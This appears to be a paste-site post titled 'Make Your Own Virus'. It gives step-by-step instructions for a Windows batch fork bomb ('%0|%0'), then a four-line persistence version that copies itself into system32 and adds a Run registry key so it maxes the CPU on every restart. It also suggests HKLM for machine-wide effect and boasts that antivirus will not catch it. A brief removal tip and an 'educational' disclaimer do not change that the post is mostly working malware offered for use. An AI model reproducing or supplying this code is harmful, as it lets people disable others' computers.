Make Your Own Virus


SUBMITTED BY: dpainbhuva

DATE: April 22, 2016, 3:49 p.m.

FORMAT: Text only

SIZE: 2.3 kB

HITS: 40944

  1. Smallest Virus of the World!! 5 Characters can EAT your machine.
  2. Go to Start > run > notepad
  3. Write this Command on notepad: %0|%0 (This is the Code for Virus)
  4. Save the File with <anyname> and .bat extension eg. hello.bat
  5. Run the File and See the Magic!!! This will eat you 100% CPU usage.
  6. Now to add the functionality of auto execution on Restart,
  7. I will write some more code in Batch Programming.
  8. @echo off
  9. copy %0 %systemroot%\system32\kb.bat
  10. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v kb /t REG_SZ /d %systemroot%\system32\kb.bat /f
  11. %0|%0
  12. Save this code in notepad with anyname and .bat extension.
  13. The four Line code above is Dangerous, This will take the CPU usage of Computer to 100% within 10 Sec. of Restart.
  14. Almost No anti-Virus can Detect it, as it is Developed by us Manually.
  15. Explanation of the Code:
  16. @echo off = Output window should not display all the Commands Written on it, only output!!
  17. copy %0 %systemroot%\system32\kb.bat = %0 means me or i or myself, so this command will copy this file in system32 with the name kb.bat
  18. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v kb /t REG_SZ /d %systemroot%\system32\kb.bat /f = this is the functionallity of c:\windows\system32\reg.exe to add registry in your computer, that will execute kb.bat on every restart. ( To make it more dangerous > use HKLM instead of HKCU)
  19. HKLM will effect whole machine > Hive Keys Local Machine
  20. HKCU will effect only the particular User account > Hive Keys Current User
  21. Last but not the Least %0|%0 will call command prompt at the speed of A^n(a raise to power n) and will gradually eat your CPU :0
  22. Windows are too vulnerable > Use my OS, Will upload soon.. cheersss…
  23. Note:
  24. 1) It is Dangerous, Newbies Don’t try it on your own machine(Try it on virtual Machine)
  25. 2) To rectify > Restart the computer in Safe mode and Delete kb.bat from C:\windows\sytem32
  26. 3) If you cannot switch on your computer in safe mode, Use Live OS like, Back track or Ubuntu or Fadora or my OS.
  27. 4) Don’t Mis-use your Knowlege
  28. Disclaimer: We are not responsible for any Kind of Loss or damage to any intellectual or Physical Property due to above post. It is solely for Educational purpose...

comments powered by Disqus